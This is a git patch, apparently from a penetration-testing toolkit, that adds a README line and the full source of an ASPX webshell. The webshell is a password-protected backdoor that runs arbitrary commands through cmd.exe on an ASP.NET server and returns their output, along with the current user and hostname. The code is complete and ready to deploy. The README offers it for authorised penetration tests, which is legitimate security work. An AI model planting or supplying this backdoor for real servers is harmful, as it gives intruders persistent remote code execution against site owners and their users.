From f816f66aae31a01abe0fa32ece8bf08070bc115c Mon Sep 17 00:00:00 2001
From: mb <mb@binary-offensive.com>
Date: Mon, 4 Feb 2019 11:11:11 -0500
Subject: [PATCH] Added webshell.aspx

---
 web/README.md     |   1 +
 web/webshell.aspx | 107 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 108 insertions(+)
 create mode 100755 web/webshell.aspx

diff --git a/web/README.md b/web/README.md
index 24673cf..933b16b 100644
--- a/web/README.md
+++ b/web/README.md
@@ -141,6 +141,7 @@ Node('/None/Base64/URLEncoder', decoded='AAAA')
 
 - **`oRTC-leak-internal-ip.js`** - Internal IP address leakage via Object RTC (ORTC) interface implemented in Microsoft Edge. ([gist](https://gist.github.com/mgeeky/03f0871fb88c64b3d6d3a725c3ba38bf))
 
+- **`webshell.aspx`** - ASPX Backdoor / Webshell equipped with password-based authentication. To be used against ASP.NET applications during Penetration Testing assignments as a proof of concept.
 
 - **`xml-attacks.md`** - XML Vulnerabilities and Attacks cheatsheet. ([gist](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870))
 
diff --git a/web/webshell.aspx b/web/webshell.aspx
new file mode 100755
index 0000000..8d24bf2
--- /dev/null
+++ b/web/webshell.aspx
@@ -0,0 +1,107 @@
+<%@ Page Language="C#" Debug="true" Trace="false" %>
+<%@ Import Namespace="System.Diagnostics" %>
+<%@ Import Namespace="System.IO" %>
+<script Language="c#" runat="server">
+
+    // =====================================================================
+    // Setup global password necessary to pass before using that webshell.
+
+    public string Password = "5eQzrXZHZwJNLvm6Q2b7PR6r";
+    
+    // =====================================================================
+
+    void Page_Load(object sender, EventArgs e)
+    {
+        PasswordTextbox.Attributes["value"] = Request.Form["PasswordTextbox"];
+        PasswordTextbox.Attributes["type"] = "password";
+        PasswordTextbox.Text = Request.Form["PasswordTextbox"];
+        CommandTextbox.Value = Request.Form["CommandTextbox"];
+    }
+
+    string ExcuteCommand(string arg)
+    {
+        if (arg.Length >= 1)
+        {
+            ProcessStartInfo psi = new ProcessStartInfo();
+            psi.FileName = "cmd.exe";
+            psi.Arguments = "/c \""+ arg + "\"";
+            psi.RedirectStandardOutput = true;
+            psi.UseShellExecute = false;
+            Process p = Process.Start(psi);
+            StreamReader stmrdr = p.StandardOutput;
+            string s = stmrdr.ReadToEnd();
+            stmrdr.Close();
+            return s;
+        }
+        return "";
+    }
+    
+    void Launch_OnClick(object sender, System.EventArgs e)
+    {
+        if (Request.Form["PasswordTextbox"] == Password) 
+        {
+            string h = Server.HtmlEncode(ExcuteCommand("hostname")).Trim();
+            string u = Server.HtmlEncode(ExcuteCommand("whoami")).Trim();
+
+            Hostname.Text = u + "@" + h;
+            CommandOutput.InnerHtml = Server.HtmlEncode(ExcuteCommand(Request.Form["CommandTextbox"]));
+        }
+        else 
+        {
+            Hostname.Text = "unknown";
+            CommandOutput.InnerHtml = "Wrong password provided.";
+        }
+    }
+
+</script>
+<!DOCTYPE html>
+<html>
+    <head>
+        <title>ASPX Backdoor</title>
+        <script>
+            function setPassword()
+            {
+                document.getElementById("PasswordTextbox").type = 'password';
+            }
+        </script>
+    </head>
+    <body onload='setPassword()'>
+
+        <h3>ASPX Backdoor.</h3>
+        <i style="font-size:9px">You need to provide valid password in order to leverage RCE.</i>
+        <br/>
+        <font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
+        <br/>
+        <hr/>
+        <form id="cmd" method="post" runat="server">
+        <table style="width:100%">
+            <tr>
+                <td width="40%">
+                    <b style="color:red">Password:</b>
+                </td>
+                <td width="60%">
+                    <asp:TextBox runat='server' id="PasswordTextbox" style="width:30%"></asp:TextBox>
+                </td>
+            </tr>
+            <tr>
+                <td width="40%">
+                    <b style="color:blue"></b>
+                    <asp:Label id="Hostname" runat='server'></asp:Label>
+                </td>
+                <td width="60%">
+                    <input type=text id="CommandTextbox" runat="server" value='' onClick="this.select();" style="width:80%" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }"/>
+                </td>
+            </tr>
+            <tr>
+                <td width="40%">
+                </td>
+                <td width="60%">
+                    <asp:Button id="Launch" runat="server" Text="Execute" OnClick="Launch_OnClick"></asp:Button>
+                </td>
+            </tr>
+        </table>
+        </form>
+        <hr />
+        <pre id="CommandOutput" runat='server' style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"></pre>
+    </body>
+</html>